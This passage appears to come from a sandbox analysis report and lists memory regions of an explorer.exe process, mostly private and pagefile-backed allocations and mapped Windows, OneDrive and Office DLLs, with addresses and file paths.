0x8291fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008290000" filename = "" Region: id = 546 start_va = 0x82a0000 end_va = 0x82a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082a0000" filename = "" Region: id = 547 start_va = 0x82b0000 end_va = 0x82b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082b0000" filename = "" Region: id = 548 start_va = 0x82c0000 end_va = 0x82c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082c0000" filename = "" Region: id = 549 start_va = 0x82d0000 end_va = 0x82d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082d0000" filename = "" Region: id = 550 start_va = 0x8370000 end_va = 0x83effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008370000" filename = "" Region: id = 551 start_va = 0x8470000 end_va = 0x84effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008470000" filename = "" Region: id = 552 start_va = 0x84f0000 end_va = 0x856ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084f0000" filename = "" Region: id = 553 start_va = 0x85f0000 end_va = 0x87effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085f0000" filename = "" Region: id = 554 start_va = 0x87f0000 end_va = 0x886ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087f0000" filename = "" Region: id = 555 start_va = 0x8870000 end_va = 0x89f7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 556 start_va = 0x8a20000 end_va = 0x8a20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a20000" filename = "" Region: id = 557 start_va = 0x8a30000 end_va = 0x8a38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a30000" filename = "" Region: id = 558 start_va = 0x8a40000 end_va = 0x8b3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 559 start_va = 0x8bc0000 end_va = 0x8bc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008bc0000" filename = "" Region: id = 560 start_va = 0x8bd0000 end_va = 0x8c17fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008bd0000" filename = "" Region: id = 561 start_va = 0x8c20000 end_va = 0x8d1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 562 start_va = 0x8e00000 end_va = 0x8e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e00000" filename = "" Region: id = 563 start_va = 0x8e10000 end_va = 0x900ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e10000" filename = "" Region: id = 564 start_va = 0x9010000 end_va = 0x910ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 565 start_va = 0x9120000 end_va = 0x9120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009120000" filename = "" Region: id = 566 start_va = 0x9130000 end_va = 0x932ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009130000" filename = "" Region: id = 567 start_va = 0x93f0000 end_va = 0x946ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000093f0000" filename = "" Region: id = 568 start_va = 0x94f0000 end_va = 0x956ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000094f0000" filename = "" Region: id = 569 start_va = 0x9670000 end_va = 0x96effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009670000" filename = "" Region: id = 570 start_va = 0x9bf0000 end_va = 0xa3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bf0000" filename = "" Region: id = 571 start_va = 0xa3f0000 end_va = 0xa46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a3f0000" filename = "" Region: id = 572 start_va = 0xa470000 end_va = 0xa4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a470000" filename = "" Region: id = 573 start_va = 0xa4f0000 end_va = 0xa56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4f0000" filename = "" Region: id = 574 start_va = 0xa570000 end_va = 0xa66ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 575 start_va = 0xa670000 end_va = 0xa76ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 576 start_va = 0xa770000 end_va = 0xa7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a770000" filename = "" Region: id = 577 start_va = 0xa7f0000 end_va = 0xa86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a7f0000" filename = "" Region: id = 578 start_va = 0xa870000 end_va = 0xa8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a870000" filename = "" Region: id = 579 start_va = 0xa8f0000 end_va = 0xa96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a8f0000" filename = "" Region: id = 580 start_va = 0xa970000 end_va = 0xad6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a970000" filename = "" Region: id = 581 start_va = 0xadf0000 end_va = 0xaeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000adf0000" filename = "" Region: id = 582 start_va = 0xaef0000 end_va = 0xafeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 583 start_va = 0xaff0000 end_va = 0xb0effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 584 start_va = 0xb170000 end_va = 0xb1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b170000" filename = "" Region: id = 585 start_va = 0xb1f0000 end_va = 0xb26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1f0000" filename = "" Region: id = 586 start_va = 0xb2f0000 end_va = 0xb36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2f0000" filename = "" Region: id = 587 start_va = 0xb370000 end_va = 0xb3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b370000" filename = "" Region: id = 588 start_va = 0xb5f0000 end_va = 0xb66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5f0000" filename = "" Region: id = 589 start_va = 0xb670000 end_va = 0xb6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b670000" filename = "" Region: id = 590 start_va = 0xb6f0000 end_va = 0xb76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6f0000" filename = "" Region: id = 591 start_va = 0xb970000 end_va = 0xb9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b970000" filename = "" Region: id = 592 start_va = 0xb9f0000 end_va = 0xba6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9f0000" filename = "" Region: id = 593 start_va = 0xba70000 end_va = 0xbaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ba70000" filename = "" Region: id = 594 start_va = 0xbcf0000 end_va = 0xbd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bcf0000" filename = "" Region: id = 595 start_va = 0xbd70000 end_va = 0xc76ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bd70000" filename = "" Region: id = 596 start_va = 0xc770000 end_va = 0xf38dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 597 start_va = 0xf390000 end_va = 0xf881fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f390000" filename = "" Region: id = 598 start_va = 0x10070000 end_va = 0x100effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010070000" filename = "" Region: id = 599 start_va = 0x100f0000 end_va = 0x1016ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000100f0000" filename = "" Region: id = 600 start_va = 0x10170000 end_va = 0x101effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010170000" filename = "" Region: id = 601 start_va = 0x101f0000 end_va = 0x1026ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000101f0000" filename = "" Region: id = 602 start_va = 0x10270000 end_va = 0x102effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010270000" filename = "" Region: id = 603 start_va = 0x102f0000 end_va = 0x1036ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000102f0000" filename = "" Region: id = 604 start_va = 0x10370000 end_va = 0x103effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010370000" filename = "" Region: id = 605 start_va = 0x104f0000 end_va = 0x1056ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000104f0000" filename = "" Region: id = 606 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 607 start_va = 0x180000000 end_va = 0x18087dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 608 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 609 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 610 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 611 start_va = 0x7ff6a2500000 end_va = 0x7ff6a2947fff monitored = 0 entry_point = 0x7ff6a259e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 612 start_va = 0x7ffb0a830000 end_va = 0x7ffb0a838fff monitored = 0 entry_point = 0x7ffb0a831b60 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 613 start_va = 0x7ffb0b3f0000 end_va = 0x7ffb0b43ffff monitored = 0 entry_point = 0x7ffb0b421220 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: "c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 614 start_va = 0x7ffb0d160000 end_va = 0x7ffb0de2cfff monitored = 0 entry_point = 0x7ffb0d2ae880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 615 start_va = 0x7ffb0de30000 end_va = 0x7ffb0de3ffff monitored = 0 entry_point = 0x7ffb0de33d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 616 start_va = 0x7ffb0f370000 end_va = 0x7ffb0f4b0fff monitored = 0 entry_point = 0x7ffb0f375f70 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 617 start_va = 0x7ffb0f4c0000 end_va = 0x7ffb0f5e0fff monitored = 0 entry_point = 0x7ffb0f4c1cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 618 start_va = 0x7ffb0f9f0000 end_va = 0x7ffb0fd35fff monitored = 0 entry_point = 0x7ffb0f9f8530 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 619 start_va = 0x7ffb0fd40000 end_va = 0x7ffb0fefffff monitored = 0 entry_point = 0x7ffb0fd49e40 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 620 start_va = 0x7ffb0ff00000 end_va = 0x7ffb0ff87fff monitored = 0 entry_point = 0x7ffb0ff14510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 621 start_va = 0x7ffb0ff90000 end_va = 0x7ffb101d2fff monitored = 0 entry_point = 0x7ffb0ff936c0 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 622 start_va = 0x7ffb10260000 end_va = 0x7ffb102d8fff monitored = 0 entry_point = 0x7ffb102622d0 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 623 start_va = 0x7ffb102e0000 end_va = 0x7ffb1035afff monitored = 0 entry_point = 0x7ffb102e3af0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 624 start_va = 0x7ffb10360000 end_va = 0x7ffb104b9fff monitored = 0 entry_point = 0x7ffb10364610 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 625 start_va = 0x7ffb104c0000 end_va = 0x7ffb106bdfff monitored = 0 entry_point = 0x7ffb104c16c0 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 626 start_va = 0x7ffb106e0000 end_va = 0x7ffb1070dfff monitored = 0 entry_point = 0x7ffb106e6580 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 627 start_va = 0x7ffb10a20000 end_va = 0x7ffb10a6ffff monitored = 0 entry_point = 0x7ffb10a2be50 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 628 start_va = 0x7ffb10a70000 end_va = 0x7ffb10ad3fff monitored = 0 entry_point = 0x7ffb10a76b20 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 629 start_va = 0x7ffb10d10000 end_va = 0x7ffb10dbbfff monitored = 0 entry_point = 0x7ffb10d159c0 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 630 start_va = 0x7ffb10dc0000 end_va = 0x7ffb10e0afff monitored = 0 entry_point = 0x7ffb10dd1590 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 631 start_va = 0x7ffb10ec0000 end_va = 0x7ffb10f36fff monitored = 0 entry_point = 0x7ffb10ec2af0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 632 start_va = 0x7ffb123d0000 end_va = 0x7ffb123e6fff monitored = 0 entry_point = 0x7ffb123d2790 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 633 start_va = 0x7ffb12740000 end_va = 0x7ffb1275efff monitored = 0 entry_point = 0x7ffb127437e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 634 start_va = 0x7ffb12760000 end_va = 0x7ffb127d8fff monitored = 0 entry_point = 0x7ffb127676a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 635 start_va = 0x7ffb13090000 end_va = 0x7ffb1309bfff monitored = 0 entry_point = 0x7ffb130935c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 636 start_va = 0x7ffb130f0000 end_va = 0x7ffb13298fff monitored = 0 entry_point = 0x7ffb13144060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 637 start_va = 0x7ffb14620000 end_va = 0x7ffb14667fff monitored = 0 entry_point = 0x7ffb1462a430 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 638 start_va = 0x7ffb14670000 end_va = 0x7ffb14684fff monitored = 0 entry_point = 0x7ffb14675740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 639 start_va = 0x7ffb146e0000 end_va = 0x7ffb1471dfff monitored = 0 entry_point = 0x7ffb146e9650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 640 start_va = 0x7ffb174f0000 end_va = 0x7ffb176a7fff monitored = 0 entry_point = 0x7ffb1755e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 641 start_va = 0x7ffb180c0000 end_va = 0x7ffb1815ffff monitored = 0 entry_point = 0x7ffb18130910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 642 start_va = 0x7ffb19480000 end_va = 0x7ffb194c1fff monitored = 0 entry_point = 0x7ffb19482230 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 643 start_va = 0x7ffb194d0000 end_va = 0x7ffb194dffff monitored = 0 entry_point = 0x7ffb194d78e0 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 644 start_va = 0x7ffb196d0000 end_va = 0x7ffb1970ffff monitored = 0 entry_point = 0x7ffb196e6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 645 start_va = 0x7ffb19710000 end_va = 0x7ffb19746fff monitored = 0 entry_point = 0x7ffb197120a0 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 646 start_va = 0x7ffb19750000 end_va = 0x7ffb19a89fff monitored = 0 entry_point = 0x7ffb19758520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 647 start_va = 0x7ffb19a90000 end_va = 0x7ffb19b2dfff monitored = 0 entry_point = 0x7ffb19ad9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 648 start_va = 0x7ffb19b30000 end_va = 0x7ffb19b46fff monitored = 0 entry_point = 0x7ffb19b3c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 649 start_va = 0x7ffb19b50000 end_va = 0x7ffb19d63fff monitored = 0 entry_point = 0x7ffb19b51000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 650 start_va = 0x7ffb19d70000 end_va = 0x7ffb19ffdfff monitored = 0 entry_point = 0x7ffb19e40f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 651 start_va = 0x7ffb1a000000 end_va = 0x7ffb1a009fff monitored = 0 entry_point = 0x7ffb1a001350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 652 start_va = 0x7ffb1a010000 end_va = 0x7ffb1a0fefff monitored = 0 entry_point = 0x7ffb1a0329cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll") Region: id = 653 start_va = 0x7ffb1a100000 end_va = 0x7ffb1a1a5fff monitored = 0 entry_point = 0x7ffb1a14efec region_type = mapped_file name = "msvcp120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll") Region: id = 654 start_va = 0x7ffb1a1b0000 end_va = 0x7ffb1a33efff monitored = 0 entry_point = 0x7ffb1a1c01d8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\filesyncshell64.dll") Region: id = 655 start_va = 0x7ffb1a340000 end_va = 0x7ffb1a34cfff monitored = 0 entry_point = 0x7ffb1a341ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 656 start_va = 0x7ffb1a3c0000 end_va = 0x7ffb1a40cfff monitored = 0 entry_point = 0x7ffb1a3d7de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 657 start_va = 0x7ffb1a410000 end_va = 0x7ffb1a46bfff monitored = 0 entry_point = 0x7ffb1a427190 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 658 start_va = 0x7ffb1a470000 end_va = 0x7ffb1a506fff monitored = 0 entry_point = 0x7ffb1a47ddc0 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 659 start_va = 0x7ffb1a510000 end_va = 0x7ffb1a521fff monitored = 0 entry_point = 0x7ffb1a513580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 660 start_va = 0x7ffb1a590000 end_va = 0x7ffb1a5a3fff monitored = 0 entry_point = 0x7ffb1a593710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 661 start_va = 0x7ffb1a640000 end_va = 0x7ffb1a65dfff monitored = 0 entry_point = 0x7ffb1a64ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 662 start_va = 0x7ffb1a660000 end_va = 0x7ffb1a6f3fff monitored = 0 entry_point = 0x7ffb1a699210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 663 start_va = 0x7ffb1a700000 end_va = 0x7ffb1a9a2fff monitored = 0 entry_point = 0x7ffb1a726190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 664 start_va = 0x7ffb1a9b0000 end_va = 0x7ffb1aa2ffff monitored = 0 entry_point = 0x7ffb1a9dd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 665 start_va = 0x7ffb1aa30000 end_va = 0x7ffb1aa51fff monitored = 0 entry_point = 0x7ffb1aa32580 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 666 start_va = 0x7ffb1aa60000 end_va = 0x7ffb1aa6bfff monitored = 0 entry_point = 0x7ffb1aa614b0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 667 start_va = 0x7ffb1aa70000 end_va = 0x7ffb1aa85fff monitored = 0 entry_point = 0x7ffb1aa71d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 668 start_va = 0x7ffb1aa90000 end_va = 0x7ffb1aab5fff monitored = 0 entry_point = 0x7ffb1aaa5cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 669 start_va = 0x7ffb1aac0000 end_va = 0x7ffb1aaeafff monitored = 0 entry_point = 0x7ffb1aac4240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 670 start_va = 0x7ffb1ac60000 end_va = 0x7ffb1ac85fff monitored = 0 entry_point = 0x7ffb1ac61cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 671 start_va = 0x7ffb1ac90000 end_va = 0x7ffb1ad6afff monitored = 0 entry_point = 0x7ffb1aca28b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 672 start_va = 